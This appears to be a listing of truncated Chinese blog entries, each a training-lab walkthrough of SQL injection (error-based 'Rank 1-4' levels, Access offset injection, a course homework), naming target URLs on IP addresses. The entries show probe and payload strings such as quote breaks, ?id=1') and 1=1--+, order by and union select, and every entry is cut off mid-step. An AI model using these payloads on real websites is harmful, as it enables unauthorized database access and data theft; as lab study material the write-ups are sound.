SQL注入-显错注入Rank 4
目标:http://120.203.13.75:8150/New/ErrorBased/RankFour/sql-four/?id=11.输入单引号无报错信息,输入双引号,报错 near '"1"") LIMIT 0,1' at line 1,多了")2.构造?id=1")and 1=1 --+、?id=1")a
SQL注入-显错注入Rank 3
目标:http://120.203.13.75:8150/New/ErrorBased/RankThree/sql-three/?id=11.输入单引号查看报错信息:near ''1'') LIMIT 0,1' at line 1,多了')2.构造?id=1') and 1=1--+、?id=1') and 1=2--+3.order
SQL注入-显错注入Rank 2
目标url:http://120.203.13.75:8150/New/ErrorBased/RankTwo/sql-two/?id=11.输入单引号,提示near '' LIMIT 0,1' at line 1,多了一个单引号,整形注入2.构造:?id=1 and 1=1、?id=1 and 1=2 存在注入3.order by 3, 4.?id=-
SQL注入-显错注入Rank 1
目标url:http://120.203.13.75:8150/New/ErrorBased/RankOne/sql-one/1.根据提示补全url:http://120.203.13.75:8150/New/ErrorBased/RankOne/sql-one/?id=12.输入单引号'报错,near ''1'' LIMIT 0,1' at lin
化白 Access-偏移注入
目标:http://x.x.x.x:8001/ProductShow.asp?ID=105 1=1/1=2确定存在SQL注入order by结果为26个字段;union select猜测出存在admin表;判断产品id表和admin表分属2个表,即order by的字段数为产品表的字段;因为union select使用前后字段须一致,id=105 union select 1,2,4,
化白作业提交 公开课第一章
目标地址为:http://117.41.229.122:8003/?id=11. 单引号,http://117.41.229.122:8003/?id=1' 数据库报错;2. and 1=1,http://117.41.229.122:8003/?id=1 and 1=1,SQL语句为 select * from *** where id =1 and 1=1,页面显示正常;3